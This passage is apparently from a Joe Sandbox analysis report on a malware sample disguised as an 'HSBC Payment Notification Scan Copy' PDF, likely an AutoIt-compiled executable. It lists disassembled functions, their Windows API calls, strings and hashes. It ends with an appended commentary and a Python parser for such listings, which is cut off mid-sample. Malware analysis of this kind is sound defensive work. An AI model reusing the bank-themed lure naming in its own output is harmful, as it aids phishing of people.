                                                                                                                                                      • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 464785882-4108050209
                                                                                                                                                    • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                                                                                    • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                                                                                                                                    • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                                                                                    • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 004774DE
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                                                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004776A2
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004776C8
                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004777A6
                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                    • Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                                                                                                                    • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                                                                                                                    • Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                                                                                                                    • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                    • Opcode ID: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                                                                                                                                                    • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                                                                                                                    • Opcode Fuzzy Hash: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                                                                                                                                                    • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Opcode ID: 898de28bb484df63747157cb3ef6f90b3c7ef963803cd894e05c1e747d8c1ffa
• Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
• Opcode Fuzzy Hash: 898de28bb484df63747157cb3ef6f90b3c7ef963803cd894e05c1e747d8c1ffa
• Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
APIs
• GetSysColor.USER32(00000012), ref: 0048A903
• SetTextColor.GDI32(?,?), ref: 0048A907
• GetSysColorBrush.USER32(0000000F), ref: 0048A91D
• GetSysColor.USER32(0000000F), ref: 0048A928
• CreateSolidBrush.GDI32(?), ref: 0048A92D
• GetSysColor.USER32(00000011), ref: 0048A945
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
• SelectObject.GDI32(?,00000000), ref: 0048A964
• SetBkColor.GDI32(?,00000000), ref: 0048A96D
• SelectObject.GDI32(?,?), ref: 0048A97A
• InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
• InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
• DrawFocusRect.USER32(?,?), ref: 0048AA3D
• GetSysColor.USER32(00000011), ref: 0048AA4B
• SetTextColor.GDI32(?,00000000), ref: 0048AA53
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
• SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
• DeleteObject.GDI32(?), ref: 0048AA89
• SelectObject.GDI32(?,?), ref: 0048AA8F
• DeleteObject.GDI32(?), ref: 0048AA94
• SetTextColor.GDI32(?,?), ref: 0048AA9A
• SetBkColor.GDI32(?,?), ref: 0048AAA4
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: 477735c6bd52301878b185c76481b2a1a4b288ea4f41a62aa18eeb4dbc315d9d
• Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
• Opcode Fuzzy Hash: 477735c6bd52301878b185c76481b2a1a4b288ea4f41a62aa18eeb4dbc315d9d
• Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
• CharNextW.USER32(0000014E), ref: 00488B01
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
• SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
• _memset.LIBCMT ref: 00488C44
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
• _memset.LIBCMT ref: 00488CEC
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
• SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
• DrawMenuBar.USER32(?), ref: 00488EC3
• SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
• Opcode ID: 6d304d09a9ba669aeba86dcc0ed2949a670ea02e8edc27067d39c7658e1f624e
• Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
• Opcode Fuzzy Hash: 6d304d09a9ba669aeba86dcc0ed2949a670ea02e8edc27067d39c7658e1f624e
• Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
APIs
• GetCursorPos.USER32(?), ref: 004849CA
• GetDesktopWindow.USER32 ref: 004849DF
• GetWindowRect.USER32(00000000), ref: 004849E6
• GetWindowLongW.USER32(?,000000F0), ref: 00484A48
• DestroyWindow.USER32(?), ref: 00484A74
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
• SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
• IsWindowVisible.USER32(?), ref: 00484B29
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
• GetWindowRect.USER32(?,?), ref: 00484B70
• MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
• GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
• CopyRect.USER32(?,?), ref: 00484BC7
• SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
• Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
• Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
• Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
• _wcscpy.LIBCMT ref: 00464500
• _wcscmp.LIBCMT ref: 0046450B
• _wcscat.LIBCMT ref: 00464521
• _wcsstr.LIBCMT ref: 0046452C
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
• _wcscat.LIBCMT ref: 00464591
• _wcscat.LIBCMT ref: 00464598
• _wcsncpy.LIBCMT ref: 004645C3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                                                    • Opcode ID: b88462d4765e7d507f23171d62798ed34a372c9e6a155a9843904c144f7c25e8
                                                                                                                                                    • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                                                                                                                                                    • Opcode Fuzzy Hash: b88462d4765e7d507f23171d62798ed34a372c9e6a155a9843904c144f7c25e8
                                                                                                                                                    • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
• GetSystemMetrics.USER32(00000007), ref: 004028C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
• GetSystemMetrics.USER32(00000008), ref: 004028F7
• GetSystemMetrics.USER32(00000004), ref: 0040291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
• GetClientRect.USER32(00000000,000000FF), ref: 004029AE
• GetStockObject.GDI32(00000011), ref: 004029CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
  • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
  • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
  • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
  • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
• SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
• Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
• Opcode Fuzzy Hash: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
• Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
• __swprintf.LIBCMT ref: 0045A51B
• _wcscmp.LIBCMT ref: 0045A52E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
• _wcscmp.LIBCMT ref: 0045A5BF
• GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
• GetDlgCtrlID.USER32(?), ref: 0045A648
• GetWindowRect.USER32(?,?), ref: 0045A67E
• GetParent.USER32(?), ref: 0045A69C
• ScreenToClient.USER32(00000000), ref: 0045A6A3
• GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
• _wcscmp.LIBCMT ref: 0045A731
• GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
• _wcscmp.LIBCMT ref: 0045A76B
  • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
• Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
• Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
• Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
• Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
• _wcscmp.LIBCMT ref: 0045AF29
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
• CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
• _wcscmp.LIBCMT ref: 0045AF8C
• _wcsstr.LIBCMT ref: 0045AF9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
• _wcscmp.LIBCMT ref: 0045AFE5
• GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
• GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
• _wcscmp.LIBCMT ref: 0045B065
• GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
• GetWindowRect.USER32(00000004,?), ref: 0045B0F6
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
• Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
• Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
• Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
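The per-function blocks above are the raw material an analyst works from: the direct and subcall API references (note that GetAsyncKeyState for mouse buttons 1 and 2 is reached only through subcall function 00402344, not called directly by the GUI-creation function), the strings Joe Sandbox joins with `$` under "String ID", and the Opcode/Instruction IDs under "Similarity". The parser below, an added example that is not part of the report or of Joe Sandbox tooling, turns such blocks into records so that the listing can be searched and compared rather than read top to bottom. The SAMPLE text is two of the blocks above, copied and trimmed; the WATCHLIST of input-monitoring APIs is an assumption chosen for illustration, and using Opcode IDs as cross-report function fingerprints is this example's use of them, not something the page states.

```python
"""Parse a Joe Sandbox per-function API listing into records and triage API usage.

Added example; not part of the report or of Joe Sandbox. SAMPLE is copied and
trimmed from the listing above; WATCHLIST is an assumed, illustrative set.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two function blocks from the report above, trimmed.
SAMPLE = """APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
• GetSystemMetrics.USER32(00000007), ref: 004028C4
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
  • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
  • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
• SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
• Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
• _wcscmp.LIBCMT ref: 0045AF29
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
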